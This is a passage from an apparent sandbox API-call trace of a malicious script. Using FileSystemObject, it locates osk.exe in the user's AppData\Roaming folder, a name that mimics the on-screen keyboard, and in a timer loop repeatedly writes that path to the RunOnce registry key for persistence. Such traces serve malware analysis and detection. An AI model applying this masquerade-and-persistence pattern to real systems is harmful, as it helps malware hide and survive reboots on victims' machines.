[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.452] IUnknown:Release (This=0x787518) returned 0x1 [0082.452] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.452] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.452] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.453] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.453] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.453] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.453] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.453] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.453] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.453] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0082.453] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.453] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x76 [0082.453] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.454] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0082.454] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.454] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.454] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.454] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.454] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.454] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.454] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.454] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.455] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.455] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.455] RegCloseKey (hKey=0x280) returned 0x0 [0082.455] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.455] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.455] SetTimer (hWnd=0x20280, nIDEvent=0x20f1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f1 [0082.455] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.467] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.467] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.468] KillTimer (hWnd=0x20280, uIDEvent=0x20f1) returned 1 [0082.468] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.468] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.468] IUnknown:Release (This=0x787518) returned 0x1 [0082.468] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.468] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.468] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.468] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.468] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.468] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.468] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.469] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.469] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.469] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0082.469] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.469] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x77 [0082.469] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.470] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0082.470] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.470] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.470] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.470] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.470] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.470] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.470] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.470] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.470] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.470] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.470] RegCloseKey (hKey=0x280) returned 0x0 [0082.471] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.471] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.471] SetTimer (hWnd=0x20280, nIDEvent=0x20f2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f2 [0082.471] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.483] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.483] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.483] KillTimer (hWnd=0x20280, uIDEvent=0x20f2) returned 1 [0082.483] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.483] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.483] IUnknown:Release (This=0x787518) returned 0x1 [0082.483] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.483] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.484] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.484] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.484] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0082.484] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.484] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x78 [0082.484] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.485] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0082.485] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.485] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.485] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.485] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.485] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.485] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.486] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.486] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.486] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.486] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.486] RegCloseKey (hKey=0x280) returned 0x0 [0082.486] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.486] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.486] SetTimer (hWnd=0x20280, nIDEvent=0x20f3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f3 [0082.486] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, 